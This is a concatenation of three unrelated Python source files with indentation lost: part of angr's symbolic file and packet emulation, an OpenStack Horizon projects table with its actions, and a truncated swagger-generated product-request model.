the SHORT_READS option is enabled, reads will return a symbolic size constrained to be less than or equal to the
requested size.
A SimPackets cannot be used for both reading and writing - for socket objects that can be both read and written to
you should use a file descriptor to multiplex the read and write operations into two separate file storage
mechanisms.
:param name: The name of the file, for cosmetic purposes
:param write_mode: Whether this file is opened in read or write mode. If this is unspecified it will be
autodetected.
:param content: Some initial content to use for the file. Can be a list of bytestrings or a list of tuples of
content ASTs and size ASTs.
:ivar write_mode: See the eponymous parameter
:ivar content: A list of packets, as tuples of content ASTs and size ASTs.
"""
def __init__(self, name, write_mode=None, content=None, writable=True, ident=None, **kwargs):
super(SimPackets, self).__init__(name, writable=writable, ident=ident, **kwargs)
self.write_mode = write_mode
self.content = content
if self.content is None:
self.content = []
else:
self.content = [
x if type(x) is tuple \
else (x, len(x) // 8) if isinstance(x, claripy.Bits) \
else (x.ast, len(x) // 8) if isinstance(x, SimActionObject) \
else (claripy.BVV(x), len(x)) if type(x) is bytes \
else None \
for x in self.content]
if any(x is None for x in self.content):
raise TypeError("Bad type in initial SimPacket content")
def set_state(self, state):
super().set_state(state)
# sanitize the lengths in self.content now that we know the wordsize
for i, (data, length) in enumerate(self.content):
if type(length) is int:
self.content[i] = (data, claripy.BVV(length, state.arch.bits))
elif len(length) < state.arch.bits:
self.content[i] = (data, length.zero_extend(state.arch.bits - len(length)))
elif len(length) != state.arch.bits:
raise TypeError('Bad bitvector size for length in SimPackets.content')
@property
def size(self):
return sum(x[1] for x in self.content)
def concretize(self, **kwargs):
"""
Returns a list of the packets read or written as bytestrings.
"""
lengths = [self.state.solver.eval(x[1], **kwargs) for x in self.content]
kwargs['cast_to'] = bytes
return [b'' if i == 0 else self.state.solver.eval(x[0][i*self.state.arch.byte_width-1:], **kwargs) for i, x in zip(lengths, self.content)]
def read(self, pos, size, **kwargs):
"""
Read a packet from the stream.
:param int pos: The packet number to read from the sequence of the stream. May be None to append to the stream.
:param size: The size to read. May be symbolic.
:param short_reads: Whether to replace the size with a symbolic value constrained to less than or equal to the original size. If unspecified, will be chosen based on the state option.
:return: A tuple of the data read (a bitvector of the length that is the maximum length of the read) and the actual size of the read.
"""
short_reads = kwargs.pop('short_reads', None)
# sanity check on read/write modes
if self.write_mode is None:
self.write_mode = False
elif self.write_mode is True:
raise SimFileError("Cannot read and write to the same SimPackets")
# sanity check on packet number and determine if data is already present
if pos is None:
pos = len(self.content)
if pos < 0:
raise SimFileError("SimPacket.read(%d): Negative packet number?" % pos)
elif pos > len(self.content):
raise SimFileError("SimPacket.read(%d): Packet number is past frontier of %d?" % (pos, len(self.content)))
elif pos != len(self.content):
_, realsize = self.content[pos]
self.state.solver.add(realsize <= size) # assert that the packet fits within the read request
if not self.state.solver.satisfiable():
raise SimFileError("SimPackets could not fit the current packet into the read request of %s bytes: %s" % (size, self.content[pos]))
return self.content[pos] + (pos+1,)
# typecheck
if type(size) is int:
size = self.state.solver.BVV(size, self.state.arch.bits)
# The read is on the frontier. let's generate a new packet.
orig_size = size
max_size = None
# if short reads are enabled, replace size with a symbol
if short_reads is True or (short_reads is None and sim_options.SHORT_READS in self.state.options):
size = self.state.solver.BVS('packetsize_%d_%s' % (len(self.content), self.ident), self.state.arch.bits, key=('file', self.ident, 'packetsize', len(self.content)))
self.state.solver.add(size <= orig_size)
# figure out the maximum size of the read
if not self.state.solver.symbolic(size):
max_size = self.state.solver.eval(size)
elif self.state.solver.satisfiable(extra_constraints=(size <= self.state.libc.max_packet_size,)):
l.info("Constraining symbolic packet size to be less than %d", self.state.libc.max_packet_size)
if not self.state.solver.is_true(orig_size <= self.state.libc.max_packet_size):
self.state.solver.add(size <= self.state.libc.max_packet_size)
if not self.state.solver.symbolic(orig_size):
max_size = min(self.state.solver.eval(orig_size), self.state.libc.max_packet_size)
else:
max_size = self.state.solver.max(size)
else:
max_size = self.state.solver.min(size)
l.warning("Could not constrain symbolic packet size to <= %d; using minimum %d for size", self.state.libc.max_packet_size, max_size)
self.state.solver.add(size == max_size)
# generate the packet data and return it
data = self.state.solver.BVS('packet_%d_%s' % (len(self.content), self.ident), max_size * self.state.arch.byte_width, key=('file', self.ident, 'packet', len(self.content)))
packet = (data, size)
self.content.append(packet)
return packet + (pos+1,)
def write(self, pos, data, size=None, events=True, **kwargs):
"""
Write a packet to the stream.
:param int pos: The packet number to write in the sequence of the stream. May be None to append to the stream.
:param data: The data to write, as a string or bitvector.
:param size: The optional size to write. May be symbolic; must be constrained to at most the size of data.
:return: The next packet to use after this
"""
if events:
self.state.history.add_event('fs_write', filename=self.name, data=data, size=size, pos=pos)
# sanity check on read/write modes
if self.write_mode is None:
self.write_mode = True
elif self.write_mode is False:
raise SimFileError("Cannot read and write to the same SimPackets")
data = _deps_unpack(data)[0]
if type(data) is bytes:
data = claripy.BVV(data)
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
if type(size) is int:
size = self.state.solver.BVV(size, self.state.arch.bits)
# sanity check on packet number and determine if data is already present
if pos < 0:
raise SimFileError("SimPacket.write(%d): Negative packet number?" % pos)
elif pos > len(self.content):
raise SimFileError("SimPacket.write(%d): Packet number is past frontier of %d?" % (pos, len(self.content)))
elif pos != len(self.content):
realdata, realsize = self.content[pos]
maxlen = max(len(realdata), len(data))
self.state.solver.add(realdata[maxlen-1:0] == data[maxlen-1:0])
self.state.solver.add(size == realsize)
if not self.state.solver.satisfiable():
raise SimFileError("Packet write equality constraints made state unsatisfiable???")
return pos+1
# write it out!
self.content.append((_deps_unpack(data)[0], size))
return pos+1
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
return type(self)(self.name, write_mode=self.write_mode, content=self.content, ident=self.ident, concrete=self.concrete)
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
for o in others:
if o.write_mode is None:
continue
elif self.write_mode is None:
self.write_mode = o.write_mode
elif self.write_mode is not o.write_mode:
raise SimMergeError("Cannot merge SimPackets with disparate write_mode")
for o in others:
if len(o.content) != len(self.content):
raise SimMergeError("Cannot merge SimPackets with disparate number of packets")
for i, default in enumerate(self.content):
max_data_length = max(len(default[0]), max(len(o.content[i][0]) for o in others))
merged_data = self.state.solver.ite_cases(
zip(
merge_conditions[1:],
(o.content[i][0].concat(claripy.BVV(0, max_data_length - len(o.content[i][0]))) for o in others)
), default[0])
merged_size = self.state.solver.ite_cases(zip(merge_conditions[1:], (o.content[i][1] for o in others)), default[1])
self.content[i] = (merged_data, merged_size)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
class SimPacketsStream(SimPackets):
"""
A specialized SimPackets that tracks its position internally.
The pos argument to the read and write methods will be ignored, and will return None. Instead, there is an
attribute ``pos`` on the file itself, which will give you what you want.
:param name: The name of the file, for cosmetic purposes
:param pos: The initial position of the file, default zero
:param kwargs: Any other keyword arguments will go on to the SimPackets constructor.
:ivar pos: The current position in the file.
"""
def __init__(self, name, pos=0, **kwargs):
super(SimPacketsStream, self).__init__(name, **kwargs)
self.pos = pos
def read(self, _, size, **kwargs):
no_stream = kwargs.pop('no_stream', False)
if not no_stream:
pos = self.pos
data, size, pos = super(SimPacketsStream, self).read(pos, size, **kwargs)
if not no_stream:
self.pos = pos
return data, size, pos
def write(self, _, data, size=None, **kwargs):
self.pos = super(SimPacketsStream, self).write(self.pos, data, size, **kwargs)
return None
@SimStatePlugin.memo
def copy(self, memo):
c = super(SimPacketsStream, self).copy(memo)
c.pos = self.pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
if any(o.pos != self.pos for o in others):
raise SimMergeError("Can't merge SimPacketsStreams with disparate positions")
return super(SimPacketsStream, self).merge(others, merge_conditions, common_ancestor=common_ancestor)
class SimFileDescriptorBase(SimStatePlugin):
"""
The base class for implementations of POSIX file descriptors.
All file descriptors should respect the CONCRETIZE_SYMBOLIC_{READ,WRITE}_SIZES state options.
"""
def read(self, pos, size, **kwargs):
"""
Reads some data from the file, storing it into memory.
:param pos: The address to write the read data into memory
:param size: The requested length of the read
:return: The real length of the read
"""
data, realsize = self.read_data(size, **kwargs)
if not self.state.solver.is_true(realsize == 0):
self.state.memory.store(pos, data, size=realsize)
return realsize
def write(self, pos, size, **kwargs):
"""
Writes some data, loaded from the state, into the file.
:param pos: The address to read the data to write from in memory
:param size: The requested size of the write
:return: The real length of the write
"""
if type(pos) is str:
raise TypeError("SimFileDescriptor.write takes an address and size. Did you mean write_data?")
# Find a reasonable concrete size for the load since we don't want to concretize anything
# This is copied from SimFile.read
# TODO: refactor into a generic concretization strategy?
if self.state.solver.symbolic(size):
try:
passed_max_size = self.state.solver.max(size, extra_constraints=(size < self.state.libc.max_packet_size,))
except SimSolverError:
passed_max_size = self.state.solver.min(size)
l.warning("Symbolic write size is too large for threshold - concretizing to min (%d)", passed_max_size)
self.state.solver.add(size == passed_max_size)
else:
passed_max_size = self.state.solver.eval(size)
if passed_max_size > 2**13:
l.warning("Program performing extremely large write")
data = self.state.memory.load(pos, passed_max_size)
return self.write_data(data, size, **kwargs)
def read_data(self, size, **kwargs):
"""
Reads some data from the file, returning the data.
:param size: The requested length of the read
:return: A tuple of the data read and the real length of the read
"""
raise NotImplementedError
def write_data(self, data, size=None, **kwargs):
"""
Write some data, provided as an argument into the file.
:param data: A bitvector to write into the file
:param size: The requested size of the write (may be symbolic)
:return: The real length of the write
"""
raise NotImplementedError
def seek(self, offset, whence='start'):
"""
Seek the file descriptor to a different position in the file.
:param offset: The offset to seek to, interpreted according to whence
:param whence: What the offset is relative to; one of the strings "start", "current", or "end"
:return: A symbolic boolean describing whether the seek succeeded or not
"""
raise NotImplementedError
def tell(self):
"""
Return the current position, or None if the concept doesn't make sense for the given file.
"""
raise NotImplementedError
def eof(self):
"""
Return the EOF status. May be a symbolic boolean.
"""
raise NotImplementedError
def size(self):
"""
Return the size of the data stored in the file in bytes, or None if the concept doesn't make sense for the
given file.
"""
raise NotImplementedError
@property
def read_storage(self):
"""
Return the SimFile backing reads from this fd
"""
raise NotImplementedError
@property
def write_storage(self):
"""
Return the SimFile backing writes to this fd
"""
raise NotImplementedError
@property
def read_pos(self):
"""
Return the current position of the read file pointer.
If the underlying read file is a stream, this will return the position of the stream. Otherwise, will return
the position of the file descriptor in the file.
"""
raise NotImplementedError
@property
def write_pos(self):
"""
Return the current position of the read file pointer.
If the underlying read file is a stream, this will return the position of the stream. Otherwise, will return
the position of the file descriptor in the file.
"""
raise NotImplementedError
def concretize(self, **kwargs):
"""
Return a concretizeation of the data in the underlying file. Has different return types to represent differnt
data structures on a per-class basis.
Any arguments passed to this will be passed onto state.solver.eval.
"""
raise NotImplementedError
def _prep_read(self, size):
return self._prep_generic(size, True)
def _prep_write(self, size):
return self._prep_generic(size, False)
def _prep_generic(self, size, is_read):
option = sim_options.CONCRETIZE_SYMBOLIC_FILE_READ_SIZES if is_read else sim_options.CONCRETIZE_SYMBOLIC_WRITE_SIZES
string = 'read' if is_read else 'write'
# check if we need to concretize the length
if option in self.state.options and self.state.solver.symbolic(size):
try:
size = self.state.solver.max(size, extra_constraints=(size <= self.state.libc.max_packet_size,))
except SimSolverError:
size = self.state.solver.min(size)
l.info("Concretizing symbolic %s size to %d", string, size)
return size
class SimFileDescriptor(SimFileDescriptorBase):
"""
A simple file descriptor forwarding reads and writes to a SimFile. Contains information about
the current opened state of the file, such as the flags or (if relevant) the current position.
:ivar file: The SimFile described to by this descriptor
:ivar flags: The mode that the file descriptor was opened with, a bitfield of flags
"""
def __init__(self, simfile, flags=0):
super(SimFileDescriptor, self).__init__()
self.file = simfile
self._pos = 0
self.flags = flags
def read_data(self, size, **kwargs):
size = self._prep_read(size)
data, realsize, self._pos = self.file.read(self._pos, size)
return data, realsize
def write_data(self, data, size=None, **kwargs):
if self.flags & Flags.O_APPEND and self.file.seekable:
self._pos = self.file.size
data = _deps_unpack(data)[0]
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
size = self._prep_write(size)
self._pos = self.file.write(self._pos, data, size)
return size
def seek(self, offset, whence='start'):
if not self.file.seekable:
return claripy.false
if type(offset) is int:
offset = self.state.solver.BVV(offset, self.state.arch.bits)
if whence == 'start':
new_pos = offset
elif whence == 'current':
new_pos = self._pos + offset
elif whence == 'end':
new_pos = self.file.size + offset
success_condition = self.state.solver.And(self.state.solver.SGE(new_pos, 0), self.state.solver.SLE(new_pos, self.file.size))
self._pos = _deps_unpack(self.state.solver.If(success_condition, new_pos, self._pos))[0]
return success_condition
def eof(self):
if not self.file.seekable:
return claripy.false
if not getattr(self.file, 'has_end', True):
return claripy.false
return self._pos == self.file.size
def tell(self):
if not self.file.seekable:
return None
return self._pos
def size(self):
return self.file.size
def concretize(self, **kwargs):
"""
Return a concretization of the underlying file. Returns whatever format is preferred by the file.
"""
return self.file.concretize(**kwargs)
@property
def read_storage(self):
return self.file
@property
def write_storage(self):
return self.file
@property
def read_pos(self):
if self.file.pos is not None:
return self.file.pos
return self._pos
@property
def write_pos(self):
if self.file.pos is not None:
return self.file.pos
return self._pos
def set_state(self, state):
self.file.set_state(state)
super(SimFileDescriptor, self).set_state(state)
@SimStatePlugin.memo
def copy(self, memo):
c = SimFileDescriptor(self.file.copy(memo), self.flags)
c._pos = self._pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
# do NOT merge file content - descriptors do not have ownership, prevent duplicate merging
if not all(type(o) is type(self) for o in others):
l.error("Cannot merge SimFileDescriptors of disparate types")
return False
if not all(o.flags == self.flags for o in others):
l.error("Cannot merge SimFileDescriptors of disparate flags")
return False
if type(self._pos) is int and all(type(o._pos) is int for o in others):
# TODO: we can do slightly better for packet-based things by having some packets have a "guard condition"
# which makes them zero length if they're not merged in
if any(o._pos != self._pos for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors over SimPackets with disparate number of packets")
elif self._pos is None and all(o._pos is None for o in others):
pass
elif self._pos is None or any(o._pos is None for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors with inconsistent None-position - please report this!")
else:
self._pos = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._pos for o in others)), self._pos)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
class SimFileDescriptorDuplex(SimFileDescriptorBase):
"""
A file descriptor that refers to two file storage mechanisms, one to read from and one to write to. As a result,
operations like seek, eof, etc no longer make sense.
:param read_file: The SimFile to read from
:param write_file: The SimFile to write to
"""
def __init__(self, read_file, write_file):
super(SimFileDescriptorDuplex, self).__init__()
self._read_file = read_file
self._write_file = write_file
self._read_pos = 0
self._write_pos = 0
def read_data(self, size, **kwargs):
size = self._prep_read(size)
data, realsize, self._read_pos = self._read_file.read(self._read_pos, size)
return data, realsize
def write_data(self, data, size=None, **kwargs):
data = _deps_unpack(data)[0]
if size is None:
size = len(data) // self.state.arch.byte_width if isinstance(data, claripy.Bits) else len(data)
size = self._prep_write(size)
self._write_pos = self._write_file.write(self._write_pos, data, size)
return size
def set_state(self, state):
self._read_file.set_state(state)
self._write_file.set_state(state)
super(SimFileDescriptorDuplex, self).set_state(state)
def eof(self):
# the thing that makes the most sense is for this to refer to the read eof status...
if not self._read_file.seekable:
return claripy.false
if not getattr(self._read_file, 'has_end', True):
return claripy.false
return self._read_pos == self._read_file.size
def tell(self):
return None
def seek(self, offset, whence='start'):
return claripy.false
def size(self):
return None
def concretize(self, **kwargs):
"""
Return a concretization of the underlying files, as a tuple of (read file, write file).
"""
return (self._read_file.concretize(**kwargs), self._write_file.concretize(**kwargs))
@property
def read_storage(self):
return self._read_file
@property
def write_storage(self):
return self._write_file
@property
def read_pos(self):
if self._read_file.pos is not None:
return self._read_file.pos
return self._read_pos
@property
def write_pos(self):
if self._write_file.pos is not None:
return self._write_file.pos
return self._write_pos
@SimStatePlugin.memo
def copy(self, memo):
c = SimFileDescriptorDuplex(self._read_file.copy(memo), self._write_file.copy(memo))
c._read_pos = self._read_pos
c._write_pos = self._write_pos
return c
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
# do NOT merge storage mechanisms here - fs and posix handle that
if not all(type(o) is type(self) for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors of disparate types")
if type(self._read_pos) is int and all(type(o._read_pos) is int for o in others):
if any(o._read_pos != self._read_pos for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors over SimPackets with disparate number of packets")
elif self._read_pos is None and all(o._read_pos is None for o in others):
pass
elif self._read_pos is None or any(o._read_pos is None for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors with inconsistent None-position - please report this!")
else:
self._read_pos = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._read_pos for o in others)), self._read_pos)
if type(self._write_pos) is int and all(type(o._write_pos) is int for o in others):
if any(o._write_pos != self._write_pos for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors over SimPackets with disparate number of packets")
elif self._write_pos is None and all(o._write_pos is None for o in others):
pass
elif self._write_pos is None or any(o._write_pos is None for o in others):
raise SimMergeError("Cannot merge SimFileDescriptors with inconsistent None-position - please report this!")
else:
self._write_pos = self.state.solver.ite_cases(zip(merge_conditions[1:], (o._write_pos for o in others)), self._write_pos)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
class SimPacketsSlots(SimFileBase):
"""
SimPacketsSlots is the new SimDialogue, if you've ever seen that before.
The idea is that in some cases, the only thing you really care about is getting the lengths of reads right, and
some of them should be short reads, and some of them should be truncated. You provide to this class a list of read
lengths, and it figures out the length of each read, and delivers some content.
This class will NOT respect the position argument you pass it - this storage is not stateless.
"""
seekable = False
def __init__(self, name, read_sizes, ident=None, **kwargs):
super(SimPacketsSlots, self).__init__(name, writable=False, ident=ident)
self.read_sizes = read_sizes
self.read_data = []
def concretize(self, **kwargs):
return [self.state.solver.eval(var, cast_to=bytes, **kwargs) for var in self.read_data]
def read(self, pos, size, **kwargs):
if not self.read_sizes:
return self.state.BVV(0, 0), 0, None
try:
req_size = self.state.solver.eval_one(size)
except SimSolverError:
raise SimFileError("SimPacketsSlots can't handle multivalued read sizes")
avail_size = self.read_sizes[0]
if avail_size > req_size:
# chop the packet in half
real_size = req_size
self.read_sizes[0] -= req_size
else:
# short read or full size read
real_size = avail_size
self.read_sizes.pop(0)
data = self.state.solver.BVS('packet_%d_%s' % (len(self.read_data), self.ident), real_size*self.state.arch.byte_width, key=('file', self.ident, 'packet', len(self.read_data)))
self.read_data.append(data)
return data, real_size, None
def write(self, pos, data, size=None, **kwargs):
raise SimFileError("Trying to write to SimPacketsSlots? Illegal")
@property
def size(self):
return sum(len(x) for x in self.read_data) // self.state.arch.byte_width
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
o = SimPacketsSlots(self.name, self.read_sizes, ident=self.ident)
o.read_data = list(self.read_data)
return o
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
if any(self.read_sizes != o.read_sizes for o in others):
raise SimMergeError("Can't merge SimPacketsSlots with disparate reads")
already_read_sizes = [len(x) for x in self.read_data]
if any(already_read_sizes != [len(x) for x in o.read_data] for o in others):
raise SimMergeError("Can't merge SimPacketsSlots with disparate reads")
for i, default_var in self.read_data:
self.read_data[i] = self.state.solver.ite_cases(zip(merge_conditions[1:], [o.read_data[i] for o in others]), default_var)
return True
def widen(self, _):
raise SimMergeError("Widening the filesystem is unsupported")
from ..errors import SimMergeError, SimFileError, SimSolverError
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.exceptions import ValidationError # noqa
from django.core.urlresolvers import reverse
from django.template import defaultfilters as filters
from django.utils.http import urlencode
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from openstack_auth import utils as auth_utils
from horizon import exceptions
from horizon import forms
from horizon import tables
from keystoneclient.exceptions import Conflict # noqa
from openstack_dashboard import api
from openstack_dashboard import policy
class RescopeTokenToProject(tables.LinkAction):
name = "rescope"
verbose_name = _("Set as Active Project")
url = "switch_tenants"
def allowed(self, request, project):
# allow rescoping token to any project the user has a role on,
# authorized_tenants, and that they are not currently scoped to
return next((True for proj in request.user.authorized_tenants
if proj.id == project.id and
project.id != request.user.project_id), False)
def get_link_url(self, project):
# redirects to the switch_tenants url which then will redirect
# back to this page
dash_url = reverse("horizon:identity:projects:index")
base_url = reverse(self.url, args=[project.id])
param = urlencode({"next": dash_url})
return "?".join([base_url, param])
class UpdateMembersLink(tables.LinkAction):
name = "users"
verbose_name = _("Manage Members")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:list_users"),
("identity", "identity:list_roles"))
def get_link_url(self, project):
step = 'update_members'
base_url = reverse(self.url, args=[project.id])
param = urlencode({"step": step})
return "?".join([base_url, param])
class UpdateGroupsLink(tables.LinkAction):
name = "groups"
verbose_name = _("Modify Groups")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (("identity", "identity:list_groups"),)
def allowed(self, request, project):
return api.keystone.VERSIONS.active >= 3
def get_link_url(self, project):
step = 'update_group_members'
base_url = reverse(self.url, args=[project.id])
param = urlencode({"step": step})
return "?".join([base_url, param])
class UsageLink(tables.LinkAction):
name = "usage"
verbose_name = _("View Usage")
url = "horizon:identity:projects:usage"
icon = "stats"
policy_rules = (("compute", "compute_extension:simple_tenant_usage:show"),)
def allowed(self, request, project):
return request.user.is_superuser
class CreateProject(tables.LinkAction):
name = "create"
verbose_name = _("Create Project")
url = "horizon:identity:projects:create"
classes = ("ajax-modal",)
icon = "plus"
policy_rules = (('identity', 'identity:create_project'),)
def allowed(self, request, project):
return api.keystone.keystone_can_edit_project()
class UpdateProject(tables.LinkAction):
name = "update"
verbose_name = _("Edit Project")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (('identity', 'identity:update_project'),)
def allowed(self, request, project):
return api.keystone.keystone_can_edit_project()
class ModifyQuotas(tables.LinkAction):
name = "quotas"
verbose_name = _("Modify Quotas")
url = "horizon:identity:projects:update"
classes = ("ajax-modal",)
icon = "pencil"
policy_rules = (('compute', "compute_extension:quotas:update"),)
def get_link_url(self, project):
step = 'update_quotas'
base_url = reverse(self.url, args=[project.id])
param = urlencode({"step": step})
return "?".join([base_url, param])
class DeleteTenantsAction(tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Project",
u"Delete Projects",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted Project",
u"Deleted Projects",
count
)
policy_rules = (("identity", "identity:delete_project"),)
def allowed(self, request, project):
return api.keystone.keystone_can_edit_project()
def delete(self, request, obj_id):
api.keystone.tenant_delete(request, obj_id)
def handle(self, table, request, obj_ids):
response = \
super(DeleteTenantsAction, self).handle(table, request, obj_ids)
auth_utils.remove_project_cache(request.user.token.id)
return response
class TenantFilterAction(tables.FilterAction):
def filter(self, table, tenants, filter_string):
"""Really naive case-insensitive search."""
# FIXME(gabriel): This should be smarter. Written for demo purposes.
q = filter_string.lower()
def comp(tenant):
if q in tenant.name.lower():
return True
return False
return filter(comp, tenants)
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, project_id):
project_info = api.keystone.tenant_get(request, project_id,
admin=True)
return project_info
class UpdateCell(tables.UpdateAction):
def allowed(self, request, project, cell):
policy_rule = (("identity", "identity:update_project"),)
return (
(cell.column.name != 'enabled' or
request.user.token.project['id'] != cell.datum.id) and
api.keystone.keystone_can_edit_project() and
policy.check(policy_rule, request))
def update_cell(self, request, datum, project_id,
cell_name, new_cell_value):
# inline update project info
try:
project_obj = datum
# updating changed value by new value
setattr(project_obj, cell_name, new_cell_value)
api.keystone.tenant_update(
request,
project_id,
name=project_obj.name,
description=project_obj.description,
enabled=project_obj.enabled)
except Conflict:
# Returning a nice error message about name conflict. The message
# from exception is not that clear for the users.
message = _("This name is already taken.")
raise ValidationError(message)
except Exception:
exceptions.handle(request, ignore=True)
return False
return True
class TenantsTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Name'),
link=("horizon:identity:projects:detail"),
form_field=forms.CharField(max_length=64),
update_action=UpdateCell)
description = tables.Column(lambda obj: getattr(obj, 'description', None),
verbose_name=_('Description'),
form_field=forms.CharField(
widget=forms.Textarea(attrs={'rows': 4}),
required=False),
update_action=UpdateCell)
id = tables.Column('id', verbose_name=_('Project ID'))
enabled = tables.Column('enabled', verbose_name=_('Enabled'), status=True,
filters=(filters.yesno, filters.capfirst),
form_field=forms.BooleanField(
label=_('Enabled'),
required=False),
update_action=UpdateCell)
class Meta(object):
name = "tenants"
verbose_name = _("Projects")
row_class = UpdateRow
row_actions = (UpdateMembersLink, UpdateGroupsLink, UpdateProject,
UsageLink, ModifyQuotas, DeleteTenantsAction,
RescopeTokenToProject)
table_actions = (TenantFilterAction, CreateProject,
DeleteTenantsAction)
pagination_param = "tenant_marker"
|
|
# coding: utf-8
"""
Server API
Reference for Server API (REST/Json)
OpenAPI spec version: 2.0.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class CreateProductRequest(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, name=None, description_short=None, description=None, meta_title=None, meta_description=None, meta_keywords=None, link_rewrite=None, active=None, reference=None, date_from=None, date_to=None, availability_before=None, availability_after=None, id_category_default=None, tags=None):
"""
CreateProductRequest - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'list[I18nFieldInput]',
'description_short': 'list[I18nFieldInput]',
'description': 'list[I18nFieldInput]',
'meta_title': 'list[I18nFieldInput]',
'meta_description': 'list[I18nFieldInput]',
'meta_keywords': 'list[I18nFieldInput]',
'link_rewrite': 'list[I18nFieldInput]',
'active': 'bool',
'reference': 'str',
'date_from': 'str',
'date_to': 'str',
'availability_before': 'int',
'availability_after': 'int',
'id_category_default': 'int',
'tags': 'list[I18nField]'
}
self.attribute_map = {
'name': 'name',
'description_short': 'description_short',
'description': 'description',
'meta_title': 'meta_title',
'meta_description': 'meta_description',
'meta_keywords': 'meta_keywords',
'link_rewrite': 'link_rewrite',
'active': 'active',
'reference': 'reference',
'date_from': 'date_from',
'date_to': 'date_to',
'availability_before': 'availability_before',
'availability_after': 'availability_after',
'id_category_default': 'id_category_default',
'tags': 'tags'
}
self._name = name
self._description_short = description_short
self._description = description
self._meta_title = meta_title
self._meta_description = meta_description
self._meta_keywords = meta_keywords
self._link_rewrite = link_rewrite
self._active = active
self._reference = reference
self._date_from = date_from
self._date_to = date_to
self._availability_before = availability_before
self._availability_after = availability_after
self._id_category_default = id_category_default
self._tags = tags
@property
def name(self):
"""
Gets the name of this CreateProductRequest.
:return: The name of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this CreateProductRequest.
:param name: The name of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`")
self._name = name
@property
def description_short(self):
"""
Gets the description_short of this CreateProductRequest.
:return: The description_short of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._description_short
@description_short.setter
def description_short(self, description_short):
"""
Sets the description_short of this CreateProductRequest.
:param description_short: The description_short of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._description_short = description_short
@property
def description(self):
"""
Gets the description of this CreateProductRequest.
:return: The description of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this CreateProductRequest.
:param description: The description of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._description = description
@property
def meta_title(self):
"""
Gets the meta_title of this CreateProductRequest.
:return: The meta_title of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._meta_title
@meta_title.setter
def meta_title(self, meta_title):
"""
Sets the meta_title of this CreateProductRequest.
:param meta_title: The meta_title of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._meta_title = meta_title
@property
def meta_description(self):
"""
Gets the meta_description of this CreateProductRequest.
:return: The meta_description of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._meta_description
@meta_description.setter
def meta_description(self, meta_description):
"""
Sets the meta_description of this CreateProductRequest.
:param meta_description: The meta_description of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._meta_description = meta_description
@property
def meta_keywords(self):
"""
Gets the meta_keywords of this CreateProductRequest.
:return: The meta_keywords of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._meta_keywords
@meta_keywords.setter
def meta_keywords(self, meta_keywords):
"""
Sets the meta_keywords of this CreateProductRequest.
:param meta_keywords: The meta_keywords of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
self._meta_keywords = meta_keywords
@property
def link_rewrite(self):
"""
Gets the link_rewrite of this CreateProductRequest.
:return: The link_rewrite of this CreateProductRequest.
:rtype: list[I18nFieldInput]
"""
return self._link_rewrite
@link_rewrite.setter
def link_rewrite(self, link_rewrite):
"""
Sets the link_rewrite of this CreateProductRequest.
:param link_rewrite: The link_rewrite of this CreateProductRequest.
:type: list[I18nFieldInput]
"""
if link_rewrite is None:
raise ValueError("Invalid value for `link_rewrite`, must not be `None`")
self._link_rewrite = link_rewrite
@property
def active(self):
"""
